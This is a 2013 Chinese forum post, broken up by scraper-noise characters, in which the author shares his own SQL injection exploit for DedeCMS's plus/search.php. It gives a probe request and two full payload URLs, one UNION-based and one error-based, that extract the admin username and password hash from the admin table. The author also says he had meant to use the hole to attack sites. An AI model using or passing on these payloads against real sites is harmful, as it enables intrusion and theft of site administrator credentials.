转载不加作者名的没JJ
$ u) D- p% E7 j5 s( _9 c
7 O7 X; u- T+ l6 h8 n* e哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
- W( V" [* u! M8 x/ t9 d# O Z q2 |2 T; p) J% Y
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
+ V/ E# e0 M" O7 r
3 n1 @% z0 h( n" f( n7 g5 _我一般是这样测试的:
; V/ M, J# W( H! E4 y; {
, w, y% W) p+ F2 Q8 @9 j" s提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a4 m# }2 X1 c. K2 ^( |6 J9 P
' K. w& L* t! Z) K0 ]' B, u
转载不加作者名的没JJ; O' h" d. P/ R0 v1 @ M8 J
% M/ N2 |1 u6 T* C/ c# O. p7 g作者:鬼哥% Y G1 }, Z) V: L ?
" x- ~( H& A$ T r: }. ?& k . K3 I: N' c# c/ |: Q& R
# W- k! ]+ c) Q( i, Z看结果如果提示' T& K! `$ h+ ?6 Y% q* V; ^
1 {2 Z0 Z5 J( Q
Safe Alert: Request Error step 2 !
- O! w. m+ S% u6 \' j& b' I
4 t5 E/ W* l q& T- U# W那么直接用下面的exp
/ T/ z2 V W' r, u' S. ?6 o, w6 L! H3 b0 O2 a
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a: L' ^6 w. L2 E$ |' w/ Z
- i. s2 k6 b1 v& D/ \) ? _" M
5 t& z6 H( \5 R看结果如果提示
/ E/ K7 O: `$ {& O* y& h4 _6 z$ j: c9 K' P
Safe Alert: Request Error step 1 !- }" y3 U9 ~4 k7 L! K
8 o8 \$ L; r7 T; H: E! J0 X那么直接用下面的exp
8 f" }: b3 |5 u4 \3 G& ~( @2 k7 t/ H, }
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a& L9 X: X/ }' k, w# ]. b- z5 h2 i
2 Z2 l3 M6 b$ X$ H
) S7 T$ b9 J5 a6 [; b! \如果正常显示证明漏洞不存在了。. }3 y3 V4 b, l' L+ D" J
. s5 R$ c& v! `: ~# E
转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对